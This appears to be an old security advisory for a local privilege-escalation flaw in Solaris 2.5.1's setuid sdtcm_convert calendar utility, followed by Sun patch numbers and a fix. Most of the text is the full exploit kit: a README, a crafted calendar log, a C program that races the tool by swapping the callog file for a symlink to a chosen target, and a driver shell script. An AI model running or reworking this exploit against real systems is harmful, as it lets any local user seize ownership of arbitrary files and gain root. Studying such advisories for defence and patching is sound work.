COMMAND
/usr/dt/bin/sdtcm_convert
SYSTEMS AFFECTED
Solaris 2.5.1
PROBLEM
Cristian SCHIPOR &60skipo@SUNDY.CS.PUB.RO> found a security hole in
sdtcm_convert on Solaris 2.5.1. sdtcm_convert - calendar data
conversion utility - allows any user to change the owner for any
file (or directory) from the system or gain root access.
The exploit is very simple. Change the permision mode of your
calendar file (callog.YOU) from /var/spool/calendar directory
(usual r--rw----) and run sdtcm_convert. sdtcm_convert 'll
observe the change and 'll want to correct it (it 'll ask you
first). You have only to delete the callog file and make a
symbolic link to a target file and your calendar file and said to
sdtcm_convert 'y' (yes). sdtcm_convert 'll make you the owner of
target file...
Criastian made an exploit. This exploit originally consisted of
four files:
exploit_dir/README
exploit_dir/callog.example
exploit_dir/orange.c
exploit_dir/thefirst
Those files now follow.
'README' file
*How to make a simple callog file*
If you dont have a /var/spool/calendar/callog.YOU edit
callog.example, replace 'skipo' with your user name and
'sundy.cs.pub.ro' with your machine name (try first the short
name, example: sundy and if you'll have troubleshotings try the
long name, example sundy.cs.pub.ro). After that copy the new
callog file in /var/spool/calendar/callog.YOUR_USER_NAME, run
once sdtcm_convert with your user name (example sdtcm_convert
skipo) and wait for corrections. Now you are ready to run the
exploit.
'callog.example' file
Version: 4
**** start of log on Fri Dec 6 14:07:43 1996 ****
(calendarattributes ("-//XAPIA/CSA/CALATTR//NONSGML Access List//EN","10:access_list","world:2")
("-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN","5:string","skipo@sundy.cs.pub.ro")
("-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN","6:user","skipo@sundy.cs.pub.ro")
("-//XAPIA/CSA/CALATTR//NONSGML Character Set//EN","5:string","C.ISO-8859-1")
("-//XAPIA/CSA/CALATTR//NONSGML Date Created//EN","7:date_time","19961206T120743Z")
("-//XAPIA/CSA/CALATTR//NONSGML Product Identifier//EN","5:string","-//DT//NONSGML Calendar Product Version 1//EN")
("-//XAPIA/CSA/CALATTR//NONSGML Version//EN","5:string","-//XAPIA/CSA/VERSION1/NONSGML CSA Version 1//EN")
)
'orange.c' file
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#define path "/var/spool/calendar/callog."
void main(int argc, char *argv[])
{
int pid,filedes[2];
FILE *f;
struct stat info;
long i;
char target[128],shift[128];
strcpy(target,argv[1]);
strcpy(shift,path);
strcat(shift,argv[2]);
if(pipe(filedes))
{
perror("cant crate pipe\n");
exit(0);
}
if(pid=fork()==0)
{
for(i=0;i<30000000;i++);
unlink(shift);
symlink(target,shift);
write(filedes[1],"y\n",sizeof("y\n"));
}
else
{
close(0);
dup(filedes[0]);
system("lemon");
stat(target,&info);
if(info.st_uid==getuid()) printf("COLL I did IT !!!\n");
}
}
'thefirst' file
/bin/echo "orange.c -> orange"
gcc -o orange orange.c
/usr/ucb/whoami > wh
read USER < ./wh
#watching for callog file if it isnt will stop
if ! test -f /var/spool/calendar/callog.$USER; then
/bin/echo "I cant found callog file. Please read README and create it"
exit;
fi
/bin/echo "what's the target ???"
read TARGET
/bin/echo /bin/chmod 000 /var/spool/calendar/callog.$USER >lemon
/bin/echo /usr/dt/bin/sdtcm_convert $USER >>lemon
/bin/chmod 700 ./lemon
./orange $TARGET $USER
SOLUTION
A simple way to correct this is to get out suid_exec bit from
sdtcm_convert. Also there is set of Sun patches that corrects this
vulnerability. They are:
103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version)
103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)